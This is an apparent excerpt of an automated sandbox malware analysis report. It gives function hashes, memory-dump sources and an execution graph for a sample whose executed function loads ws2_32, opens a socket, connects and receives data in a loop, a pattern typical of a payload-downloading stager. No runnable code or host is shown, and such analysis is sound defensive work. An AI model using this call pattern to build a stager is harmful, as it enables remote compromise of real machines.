                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c1cbd43ea0ed5392c4f5100fd1d6d35c5d88dc353c181d0dd85971709340c628
                  • Instruction ID: 9ace97bd9d208bc47c4b1aaf9d4a687880ad643290176fe0dc6ee9f1d8aaaa8c
                  • Opcode Fuzzy Hash: c1cbd43ea0ed5392c4f5100fd1d6d35c5d88dc353c181d0dd85971709340c628
                  • Instruction Fuzzy Hash: 07E0DF20328A864FE346EB38C021BA6FAC1AF51380F0480B8904DC76E2CE69A8488780
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF8162404E1 Relevance: .0, Instructions: 20COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2ccc456b6d6ae0b66015e6df321dd7ccfce2c815b71cee3572a5355d1151ca04
                  • Instruction ID: 707f0cdbbc3695caad2cbb5460ccf720cbf9967f6614d2d5eae61d8e8c36cc4a
                  • Opcode Fuzzy Hash: 2ccc456b6d6ae0b66015e6df321dd7ccfce2c815b71cee3572a5355d1151ca04
                  • Instruction Fuzzy Hash: F2E0C232C8DBCD4EDB529B7408110E97F60EF02150F4806DBE49C87443D55C51588392
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF816241A75 Relevance: .0, Instructions: 18COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.585554846.00007FF816240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF816240000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_7ff816240000_chrome.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: daaa864d9ff921161bba98f978928421e53d29a43f27536bd68c8e76eea2839e
                  • Instruction ID: 0f8bdfd0c30a4bb7afe3e3bc6fae8907ad7eb68dbbf20d6cfc810e164f33125d
                  • Opcode Fuzzy Hash: daaa864d9ff921161bba98f978928421e53d29a43f27536bd68c8e76eea2839e
                  • Instruction Fuzzy Hash: 1BD05E116699490FE387F238041A3AD50C2DB4869134440B9D81DC32D2CD5D58830382
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Execution Graph

                  Execution Coverage:28.4%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:85.7%
                  Total number of Nodes:7
                  Total number of Limit Nodes:1
                  execution_graph 52 140004000 55 1400040d6 LoadLibraryA WSAStartup 52->55 56 14000411f WSASocketA 55->56 57 14000413e connect 56->57 58 14000415e recv 57->58 59 140004154 57->59 58->59 59->56 59->57 59->58 60 140004222 59->60 60->60

                  Callgraph

                  • Executed
                  • Not Executed
                  • Opacity -> Relevance
                  • Disassembly available
                  callgraph 0 Function_0000000140004225 1 Function_00000001400040D6 1->0 2 Function_0000000140004000 2->1

                  Executed Functions

                  Function 00000001400040D6 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 138networklibraryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.811405642.0000000140004000.00000080.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                  • Associated: 0000000A.00000002.811398141.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_140000000_s1szwqo5.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoadSocketStartupconnectrecv
                  • String ID: unMa$ws2_32
                  • API String ID: 663999256-2325342229
                  • Opcode ID: 264c2c4afcd7f78c8d081639a72e3a4682661b69b9cba304066add0613ded0a9
                  • Instruction ID: ecfa5dd91f7c48ba60cf5922183fa9059d23bfe7db670abbff6e0034d4f4ea65
                  • Opcode Fuzzy Hash: 264c2c4afcd7f78c8d081639a72e3a4682661b69b9cba304066add0613ded0a9
                  • Instruction Fuzzy Hash: 634128E334918815F7635A733C567F95A40976EFE4F8C4021AF494B3D3D4A885CA8209
                  Uniqueness

                  Uniqueness Score: -1.00%